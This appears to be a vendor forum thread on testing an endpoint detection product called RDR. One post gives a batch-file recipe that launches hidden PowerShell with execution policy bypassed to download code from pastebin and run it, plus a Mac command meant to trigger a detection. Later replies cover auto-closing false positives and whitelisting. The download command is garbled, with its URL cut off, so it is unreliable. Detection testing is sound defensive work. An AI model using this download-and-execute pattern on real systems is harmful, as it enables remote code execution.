Let's start a topic for RDR testing tips of the day to safely simulate an attack that generates detections.
As you probably know, testing RDR with some simple detections can be as simple as opening command line prompt and running "whoami" on a target endpoint. However, you may also try safely something more advanced with powershell.
We will create .bat file that calls powershell to download code from 3rd party website, in this case pastebin.com containing the following harmless code:
# Filename: Hello.ps1 Write-Host Write-Host 'Hello World!' Write-Host # end of script
1. Create a hello-world.bat file
2. Add the following command:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('c"); Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1
3. Save and run it on an endpoint that has the RDR client installed.
One command you can use on Macs to generate a test Broad Context Detection is the following one:
python -m SimpleHTTPServer
Unfortunately we do not yet have a sensor for Linux but the above should work for Mac sensors.
Thanks for writing this question to the Community since other RDR users might struggle with similar issues like yours.
First of all, there's a new feature introduced in September to automatically close incidents based on previously done user actions. This feature will close automatically repeating incidents matching incidents previously closed as false positive. Incident resolution will be Closed: Auto false positive. Email notification will not be sent for Auto false positives. This should be used primarily for events you do not want to appear as new alerts or findings.
If you repeating incidents are not identical match, then another option is to submit a whitelisting request. That will definitely help in case the auto false positive feature is not suitable in your client's environment.
Hello Clive, the options mentioned earlier are the currently available options. I hope those two methods will work in your client's environment. You may provide further information as a private support ticket to allow us better consider your specific requirements while continuously improving RDR solution.
Visit the Community
Check our Forums or How-to & FAQs for advice or answers
View User Guides
Refer to our getting started guides and product manuals
Talk to our Support and get answers to your questions